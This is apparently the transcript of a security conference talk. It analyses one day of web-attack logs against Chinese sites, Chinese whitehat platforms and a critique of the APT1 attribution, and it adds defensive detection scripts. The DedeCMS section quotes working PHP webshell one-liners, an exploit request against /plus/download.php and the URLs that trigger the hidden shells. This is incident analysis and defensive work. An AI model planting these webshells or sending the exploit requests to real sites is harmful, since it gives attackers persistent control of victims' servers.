Anthony LAI and Zetta KE, Researchers, VXRL
China is a victim, too :-)

Abstract: China is always taken as an attacker who attacks others. Let us take a look at who is attacking China, what kind of attacks China is suffering from, and the possible reasons. Moreover, we take an APT research report published by another well-known agency and look at how they "deduce" that the attacks come from China, commenting on their "logic". In addition, Knownsec has provided captured and identified web attack data to VXRL for analysis, so hopefully we can get a much clearer picture. Of course, we have a hidden agenda as well (off-the-record material that is not on the agenda). It should be a fun session; let us enjoy it.
China is a victim, too :) (AVTokyo Special Edition)
Darkfloyd x Zetta, VXRL
Thank you, AVTokyo!
Thank you so much to the AVTokyo panelists
Disclaimer
We are not working for the China or Hong Kong government
We did not receive any funding or money from the Hong Kong or China governments
Objective
● China is always taken as a proactive attacker; we want to show the flip side of the analysis through:
− Part 1: A single day of web attack analysis against various web sites in China.
− Part 2: How do you find out about vulnerabilities published in China-made software and web sites?
● Media always talk about blackhats in China. How about whitehats in China?
− Part 3: APT1 report counter-comment (from Ran2)
Part 1: A single day of Web attack analysis against various web sites in China.
Research and Analysis
● Knownsec (Beijing) shared with VXRL the attack logs/data captured by their cloud-based web application firewall so that we could carry out the analysis.
● For this talk we picked 11 November, the online shopping/e-commerce discount day in Mainland China (Singles' Day, 光棍節).
● We will not disclose any victim's IP address or domain name, depending on the criticality or the nature/impact of the attack.
Single's Day
Single’s Day as Cyber Monday
http://en.wikipedia.org/wiki/Singles_Day
Research and Analysis
● What do we want to observe and analyze?
− Percentage distribution: attacks from overseas vs attacks from within the country
− What kinds of attacks do the top victims suffer?
− Any top attackers?! What are their favourite payloads and skills?
− What system(s)/platform(s) do the attackers target?
− Any interesting attack payloads?
11 Nov: Attack Traffic Vs Period
11 Nov: Attack Traffic Vs Period:Evening and Night Time
Attack Type Distribution

Attack type   No. of requests   Percentage
SCANNER       59101248          91.3447%
LRFI          218753            0.3381%
FILEI         222774            0.3443%
SPECIAL       35838             0.0554%
WEBSHELL      42463             0.0656%
COLLECTOR     4491625           6.9421%
SQLI          274792            0.4247%
XSS           225796            0.3490%
OS_COMMAND    1022              0.0016%
CODE          86140             0.1331%
OTHERS        887               0.0014%
Total         64701338          100.00%
Where are those attackers on e-Shopping Day (11 Nov 2013)?
According to our analysis, 97.5% of the attack traffic comes from IP addresses within China and the remaining 2.5% from overseas, but these figures include the scanner type.
How about excluding scanner type?
Country       Attacks
China         1070489
US            18588
Netherlands   5404
Hong Kong     4288
Korea         1823
Turkey        1429
Japan         872
Top 25 Attackers
The top 25 attacking IP addresses are all from China, except the 24th, which is from the US.
Case Studies: Victim or not?!
Voting for a “Good Guy”
tou.php: "tou" (投) means "vote" in Chinese.
The requests against this site amount to 6.5 GB of data.
In fact, we Chinese are very positive about supporting and promoting "good acts and good guys".
Possibly, it is hard to differentiate real voters from robotic ones.
When looking at the traffic, we found attack traffic from Hong Kong.
Abuse of the X-Forwarded-For header to fake different source IP addresses and vote repeatedly from 58.64.X.X.
My favorite ISP :)
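The X-Forwarded-For vote stuffing described above, as an added example (not code from the talk, from VXRL or from Knownsec): a small log analysis that flags a single TCP peer rotating many X-Forwarded-For values against tou.php, plus an attribution helper that honours the header only when the TCP peer is a reverse proxy the site operates. The log format, the peer address 58.64.0.1, the proxy address 10.0.0.9 and all sample lines are constructed for this example.

```python
"""Detect X-Forwarded-For spoofing in vote-stuffing traffic (added example)."""
import re
from collections import Counter, defaultdict

# Assumed log format: peer, ident, user, [time], "request", status, bytes, xff="..."
LOG_RE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ xff="(?P<xff>[^"]*)"$'
)

# Constructed sample: one peer hammering tou.php while rotating the
# X-Forwarded-For value; a second, honest client votes once.
SAMPLE_LOG = """\
58.64.0.1 - - [11/Nov/2013:20:01:01 +0800] "POST /tou.php HTTP/1.1" 200 512 xff="1.2.3.4"
58.64.0.1 - - [11/Nov/2013:20:01:02 +0800] "POST /tou.php HTTP/1.1" 200 512 xff="1.2.3.5"
58.64.0.1 - - [11/Nov/2013:20:01:02 +0800] "POST /tou.php HTTP/1.1" 200 512 xff="1.2.3.6"
58.64.0.1 - - [11/Nov/2013:20:01:03 +0800] "POST /tou.php HTTP/1.1" 200 512 xff="10.0.0.9, 1.2.3.7"
203.0.113.7 - - [11/Nov/2013:20:01:05 +0800] "POST /tou.php HTTP/1.1" 200 512 xff="-"
203.0.113.7 - - [11/Nov/2013:20:02:05 +0800] "GET /index.php HTTP/1.1" 200 9000 xff="-"
"""

TRUSTED_PROXIES = {"10.0.0.9"}  # assumption: the site's own reverse proxy


def parse(log_text):
    """Yield one dict per well-formed log line."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def client_ip(peer, xff, trusted=TRUSTED_PROXIES):
    """Address to attribute the request to.

    X-Forwarded-For is honoured only when the TCP peer is a proxy we control;
    otherwise the header is attacker-supplied and the peer address is used.
    """
    if peer in trusted and xff and xff != "-":
        hops = [h.strip() for h in xff.split(",")]
        # rightmost hop that is not one of our own proxies
        for hop in reversed(hops):
            if hop not in trusted:
                return hop
    return peer


def spoof_report(log_text, path="/tou.php", threshold=3):
    """Map each TCP peer to the distinct XFF values it sent to `path`;
    a peer presenting >= `threshold` different values is reported."""
    seen = defaultdict(set)
    for r in parse(log_text):
        if r["path"].split("?")[0] == path and r["xff"] != "-":
            seen[r["peer"]].add(r["xff"])
    return {peer: sorted(v) for peer, v in seen.items() if len(v) >= threshold}


def vote_counts(log_text, path="/tou.php"):
    """Count POSTed votes per attributed client, not per XFF string."""
    counts = Counter()
    for r in parse(log_text):
        if r["path"].split("?")[0] == path and r["method"] == "POST":
            counts[client_ip(r["peer"], r["xff"])] += 1
    return counts


if __name__ == "__main__":
    print(spoof_report(SAMPLE_LOG))
    print(vote_counts(SAMPLE_LOG))
```

Counting by the attributed address collapses the four spoofed votes back onto the single peer; the same rule (trust the header only from your own proxies) is what the voting application itself should apply before deduplicating by IP.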
Hey, it is 11 Nov (Single's day) for Shopping!
We found attacks against a "group purchase" web site: 47 attempts to access the site's order information via the old classic attack, OS command injection.
How about those overseas attackers?
Where are they?
Country     IP
China       116.252.224.162
US          173.208.240.190
Korea       119.70.29.137
Hong Kong   58.64.205.27
Thailand    110.34.230.226
Taiwan      118.233.66.105
Japan       202.89.232.79
Observation: Any interesting attack payload from overseas?
From the US?! Using a Chinese Python layer-7 DDoS script?! :) (from 00:00 to 23:59)
Observation: China Tools, IP address from US :)
http://www.dklkt.cn/article.asp?id=233
How about attack traffic from the US?
• Scanning and exploiting particular recently released CMS vulnerabilities.
• Targeting forums and CMSes.
• We will discuss this in more detail later.
How about attack traffic from JP?
Nothing special: only casual downloads, and the traffic is from a scanner.
Interestingly, webscan.360.cn uses a JP IP address to scan hosts in China.
How about attack traffic from KR?
Nothing special: only casual downloads, not necessarily from a scanner.
315online.com.cn - An Anti-Online Fraud Portal
How about attack traffic from TW and TH?
Typical scanner traffic, nothing special.
How about attack traffic from the Netherlands?
Scanning of a WordPress-like site in China.
Observation: Special Payloads against victims
● <URL>/plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B (truncated as on the original slide)
● Creates a webshell backdoor under DedeCMS.
● Only against DedeCMS? Just kidding: there are lots of other victims suffering from this kind of vuln: http://www.wooyun.org/searchbug.php?q=dedecms
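The arrs1[]/arrs2[] parameters above are lists of ASCII codes that the vulnerable script turns back into a string with chr(), which is why the request passes string-matching filters. As an added example (not the talk's code), here is a decoder for such payloads together with a simple heuristic a WAF or log pipeline could apply. The sample URL is constructed from the fragment on the slide and stops where the slide does, so arrs2 decodes only to its first two characters; the host name and function names are assumptions.

```python
"""Decode name[]=<int> character-code arrays in a query string (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed from the slide's fragment; the original payload is longer.
SAMPLE_URL = (
    "http://example.invalid/plus/download.php?open=1"
    "&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100"
    "&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102"
    "&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121"
)

ARR_RE = re.compile(r"^(?P<name>[A-Za-z_]\w*)\[\]$")  # PHP-style array parameter


def decode_char_arrays(url):
    """Return {param_name: decoded_string} for every name[] array whose
    values are all integers in the byte range (the chr() pattern)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    out = {}
    for key, values in qs.items():
        m = ARR_RE.match(key)
        if not m:
            continue
        try:
            codes = [int(v) for v in values]
        except ValueError:
            continue  # not a numeric array, not this pattern
        if all(0 <= c < 256 for c in codes):
            out[m.group("name")] = bytes(codes).decode("latin-1")
    return out


def is_suspicious(decoded, needles=("cfg_", "<?php", "eval(", "dede_")):
    """Heuristic: a decoded array spelling a config variable, a table prefix
    or PHP code is a strong sign of a templated exploit request."""
    return any(n in s for s in decoded.values() for n in needles)


if __name__ == "__main__":
    decoded = decode_char_arrays(SAMPLE_URL)
    print(decoded, is_suspicious(decoded))
```

Decoding arrs1 gives the string cfg_dbprefix, i.e. the request is trying to set the DedeCMS database-prefix configuration variable; that is the value a detection rule should match on, not the raw numeric parameters.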
DedeCMS (China-made CMS)
Reference: DedeCMS exploit. Interesting technique to hide the webshell: store it like a cache file.
http://www.nxadmin.com/penetration/1168.html
http://blog.csdn.net/seoyundu/article/details/12855759
/plus/download.php exploit - inject webshell: http://www.xiaosedi.com/post/dedecms_exp_01.html
/plus/search.php exploit - inject webshell: http://eoo.hk/oswork/28.htm
DedeCMS backdoor killer from Anquan.org: http://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_278959.shtml
You find 90sec.php in the log, and there is an .inc file with this statement:

{dede:php}file_put_contents('90sec.php','<?php eval($_POST[guige]);?>');{/dede:php}

However, no such file is found in the folder. Why?
Under the data/cache folder, several htm files (myad-1.htm, myad-16.htm, mytag-1208.htm) are found with the following code:

<!--
document.write("dedecmsisok<?php @eval($_POST[cmd]);?>");
-->
<!--
document.write("<?php $fp = @fopen('av.php', 'a');@fwrite($fp, '<?php eval($_POST[110]) ?>axxxxx');echo 'OK';@fclose($fp);?>");
-->
<!--
document.write("<?php echo 'dedecms 5.7 0day<br>guige, 90sec.org';@preg_replace('/[copyright]/e',$_REQUEST['guige'],'error');?>");
-->

It is strange that an .htm page could act as a webshell; the idea is that those htm files are included and generated by another PHP file. After checking, we figured it out: plus/mytag_js.php.
The backdoor webshell is triggered with the following URLs by passing in different ID values, WITHOUT being detected by the scanner:
http://www.nxadmin.com/plus/mytag_js.php?id=1208
http://www.nxadmin.com/plus/ad_js.php?id=1
Reference: http://www.nxadmin.com/penetration/1168.html
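A check for the cache-file webshell technique described above, as an added example (not the slides' code and not the Anquan.org tool): the data/cache .htm files are supposed to hold only document.write() JavaScript, so any PHP open tag, code-execution primitive (including preg_replace with the /e modifier) or read of request input inside one marks a planted shell. The sample cache tree is constructed in a temporary directory from the snippets shown on the slide plus one clean file.

```python
"""Find PHP code hidden in DedeCMS data/cache/*.htm files (added example)."""
import os
import re
import tempfile

PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
EXEC_PRIMS = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen)\s*\(|"
    r"preg_replace\s*\([^,]*?/[a-zA-Z]*e[a-zA-Z]*['\"]",  # /e modifier
    re.IGNORECASE,
)
INPUT_VARS = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")


def inspect_file(path):
    """Return the list of indicators found in one file (empty if clean)."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        body = f.read()
    findings = []
    if PHP_TAG.search(body):
        findings.append("php_tag")
    if EXEC_PRIMS.search(body):
        findings.append("exec_primitive")
    if INPUT_VARS.search(body):
        findings.append("reads_request_input")
    return findings


def scan_cache_dir(cache_dir, exts=(".htm", ".html", ".inc")):
    """Return {relative_path: [findings]} for every file that looks like a shell."""
    hits = {}
    for root, _, files in os.walk(cache_dir):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(root, name)
                findings = inspect_file(path)
                if findings:
                    hits[os.path.relpath(path, cache_dir)] = findings
    return hits


def build_sample_cache():
    """Constructed DedeCMS-like data/cache tree: one clean file, three shells."""
    d = tempfile.mkdtemp(prefix="dede_cache_")
    samples = {
        "mytag-1.htm": '<!--\ndocument.write("<a href=\\"/\\">home</a>");\n-->\n',
        "mytag-1208.htm": '<!--\ndocument.write("dedecmsisok<?php @eval($_POST[cmd]);?>");\n-->\n',
        "myad-16.htm": '<!--\ndocument.write("<?php $fp=@fopen(\'av.php\',\'a\');'
                       '@fwrite($fp,\'<?php eval($_POST[110]) ?>\');@fclose($fp);?>");\n-->\n',
        "myad-1.htm": '<!--\ndocument.write("<?php @preg_replace(\'/[copyright]/e\','
                      '$_REQUEST[\'guige\'],\'error\');?>");\n-->\n',
    }
    for name, body in samples.items():
        with open(os.path.join(d, name), "w", encoding="utf-8") as f:
            f.write(body)
    return d


if __name__ == "__main__":
    cache = build_sample_cache()
    for path, findings in sorted(scan_cache_dir(cache).items()):
        print(path, findings)
```

Run it against a real install's data/cache directory; a hit on any file that the templates never wrote PHP into is worth treating as a compromise, since ad_js.php and mytag_js.php will execute whatever those files contain.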
Part 2: Organizations with China Whitehats
Whitehats in China: Wooyun, bugs published in China
● The idea is the same as MITRE's CVE but more informative and organized
● Vendor neutral
● Public and open
● Promotes the whitehat community (http://www.wooyun.org/whitehats/)
Observation #1: CMS bugs everywhere (after Google Translate)
http://www.wooyun.org/bug.php?action=list&subtype=52
Observation #2: Even when some whitehats reported the vulns...
● A whitehat reported a high-risk vuln. to 360, but 360 said: Ignored it!
● My comment: WTF!
360 consistently ignores high- and medium-level vulns (highlighted in yellow)
http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360
Observation #3: Positive rewards from vendors and promotion of whitehats
Zoomeye (www.zoomeye.org)
Whitehats in China: Anquan.org (a safety alliance among various software and security product vendors)
● With 800 vendors
● Vendor neutral
● A platform for the public to report any infringement, privacy violation, phishing attack, etc.
● http://www.anquan.org/help/aboutus/authen/
If time permits….Part 3: APT1 Report – Counter Comment from Ran2, VXRL
APT1 Report: Counter Comment
● Has anyone read the Mandiant APT1 Report?
● The analysis was done by Ran2, Researcher, VXRL.
● Mandiant deduced that the attacks against the US came from China PLA Unit 61398 with the following deduction:
− Attacker profiling via his password
− Posts in the forum
APT1 Report from Mandiant
● On 18 February 2013, Mandiant released an unprecedented report, "APT1: Exposing One of China's Cyber Espionage Units". Mandiant claims to have identified evidence linking an APT attack group, APT1 (aka Comment Crew), to Military Cover Designator 61398 of the People's Liberation Army (PLA).
● Chinese officials have vigorously denied any link to the APT activities of which Mandiant accuses them.
● Some commentaries said: "Clearly, Mandiant caught Beijing's hands in the cookie jar".
● However, skeptics responded that the evidence produced by Mandiant did not consider any alternative conclusion other than pointing at China, or that the so-called PLA hacking lacks convincing evidence.
Clarification #1: Attacker Profiling
● "APT1 is not a ghost in a digital machine", Mandiant claims; they had identified a select number of APT1 personas. On page 51 of the APT1 Report they provide hints on how they performed the persona profiling, basically by data mining of:
− the authors of APT1's digital weapons (i.e. the malware)
− the registrants of APT1 FQDNs (aka FQDN profiling)
− the email accounts (on public social websites)
− the registration records of leaked hacker accounts from Rootkit.com
● Based on the profiling results, Mandiant believed that these three personas were based in Shanghai, responsible for authoring the malware and for preparing and launching the APT1 attacks, and that they work for the PLA.
● UglyGorilla (UG) is the key persona identified that leads to the above conclusion.
● Searching further on the Internet, I also found Jack Wang's postings in the China military forum. However, I discovered that he (UglyGorilla or Jack Wang) actually posted 15 messages, of which only 2 are related to cyber war; all the other topics include conventional warfare and even bio-chemical warfare. He even posted to the forum that he was a military warfare lover, but did not mention that he himself was a soldier. I think this piece of information should also have been disclosed in the APT1 Report.
● Even though we have a high chance of proving that UglyGorilla is Jack Wang, or Wang Dong, the author of the APT1 malware, I do not find hard proof that he is a Chinese soldier or is serving in PLA Unit 61398. The only link I can find is his posting in the Chinese military forum, but on the contrary he also said he was only a military lover.
Similar to UglyGorilla, the APT1 Report identified another persona, DOTA. Based on a captured video, I guess it was gathered from an RDP connection on the monitored hop that DOTA once used to register email accounts.
● It is clearly proven that DOTA was using a Shanghai telephone number and that he is fluent in English when communicating with other parties. I believe DOTA's password "2j3c1k" may mean 二局三处一科 (2nd Bureau, 3rd Division, 1st Section),
● but we cannot rule out that it bears other meanings, such as 二鸡三吃一刻, "the moment of cooking 2 chickens in three different ways".
● Yes, it is interesting, and there are lots of ways to interpret simple Chinese characters.
● I am not trying to find an exit for the accusation, but I would like to see more solid evidence before pointing fingers at PLA Unit 61398 as APT1.
Clarification #2: Infrastructure, Remote Desktop Sessions
● On page 4, Mandiant mentions that 1,849 of the 1,905 sessions were observed using the keyboard layout "Chinese (Simplified) - US Keyboard", and they assume that the attackers used a Chinese version of the Microsoft OS. Because the attackers were using a Chinese version of the Microsoft OS, Mandiant implies that APT1 are Mainland Chinese speakers.
● Based on the RDP protocol documentation from Microsoft, I found that the RDP client sends its keyboard layout as a 4-byte field to the RDP server (the victim or hop, in our case). If a network sniffer is installed on the RDP server, we can collect this piece of digital evidence. If the attackers used "Chinese (Simplified) - US Keyboard", on the recipient side we can locate the 4-byte value 0x0804 in the network packets.
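The keyboard-layout field Ran2 refers to, as an added example that is not part of his analysis or the talk: a parser for the RDP Client Core Data block (TS_UD_CS_CORE, MS-RDPBCGR section 2.2.1.3.2) that pulls out the 4-byte keyboardLayout and the client machine name. The layout value is the little-endian u32 at offset 16 of the block, after the 4-byte user-data header, the 4-byte version and four u16 screen/colour fields. The input block is constructed here with assumed values (client name, resolution, build number); the layout-id table covers only a handful of locales.

```python
"""Extract keyboardLayout from an RDP Client Core Data block (added example)."""
import struct

CS_CORE = 0xC001  # TS_UD_HEADER type for Client Core Data
LAYOUTS = {
    0x0804: "Chinese (Simplified) - PRC",
    0x0409: "English (United States)",
    0x0411: "Japanese",
    0x0412: "Korean",
    0x0404: "Chinese (Traditional) - Taiwan",
}


def build_cs_core(keyboard_layout, client_name="ATTACK-PC", width=1024, height=768):
    """Constructed TS_UD_CS_CORE with the required fields only (132 bytes)."""
    body = struct.pack(
        "<IHHHHII",
        0x00080004,       # version: RDP 5.0 and later
        width, height,
        0xCA01,           # colorDepth: RNS_UD_COLOR_8BPP
        0xAA03,           # SASSequence: always 0xAA03
        keyboard_layout,  # the field this example is about
        2600,             # clientBuild (assumed)
    )
    body += client_name.encode("utf-16-le").ljust(32, b"\x00")[:32]
    body += struct.pack("<III", 4, 0, 12)  # keyboardType (IBM enhanced), subtype, F-keys
    body += b"\x00" * 64                   # imeFileName
    header = struct.pack("<HH", CS_CORE, 4 + len(body))
    return header + body


def parse_user_data(blob):
    """Walk the GCC user-data blocks and return {type: block_bytes}."""
    blocks, off = {}, 0
    while off + 4 <= len(blob):
        btype, blen = struct.unpack_from("<HH", blob, off)
        if blen < 4 or off + blen > len(blob):
            raise ValueError("malformed user-data header at offset %d" % off)
        blocks[btype] = blob[off:off + blen]
        off += blen
    return blocks


def keyboard_layout(blob):
    """Return (layout_id, layout_name, client_name) from a user-data blob."""
    core = parse_user_data(blob).get(CS_CORE)
    if core is None or len(core) < 132:
        raise ValueError("no complete Client Core Data block")
    (layout,) = struct.unpack_from("<I", core, 16)
    name = core[24:56].decode("utf-16-le", errors="replace").rstrip("\x00")
    lang = layout & 0xFFFF  # low 16 bits: input language; high bits: layout variant
    return layout, LAYOUTS.get(lang, "unknown (0x%04x)" % lang), name


if __name__ == "__main__":
    print(keyboard_layout(build_cs_core(0x0804)))
```

Two caveats for anyone using this as evidence: the value is simply what the client's operating system reports, so it follows the configured input locale and can be changed at will, and once the connection negotiates TLS or CredSSP the Connect Initial carrying this block is encrypted, so a passive sniffer on the server only sees it in the clear under Standard RDP Security.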
More details from APT1 Counter Comment Report
− http://espionageware.blogspot.hk/
Summary
● Interesting payloads and practices against China sites are shown.
● Web attacks from overseas against China on 11 Nov (a day of high-volume e-commerce and online shopping) are not the majority.
● The majority of the traffic is crawlers and scanners; apart from that, the largest attack category is SQLi.
● There are lots of attacks against CMS systems in China.
● There are whitehat non-profit organizations, including Wooyun.org and Anquan.org, helping the China security community.
Summary
● We expect technical and/or journalistic reports with more reasonable deduction, sufficient proof and scientific analysis.
● We hope to see more balanced views and analysis reports, not just labelling China as the only cyberwar actor in this party.
● We hope to see fairer comment that talks about the positive side of security in China.
● Selling products and solutions is easy by giving a false sense of "threat"; however, as a researcher, please keep your ethics high and your mindset clear. We are researchers and scientists, not opportunists.
Thank you so much :)
Respect and appreciation to Zetta and Ran2 for their work, analysis and time.
We highly appreciate the attack log shared by Knownsec for research purposes.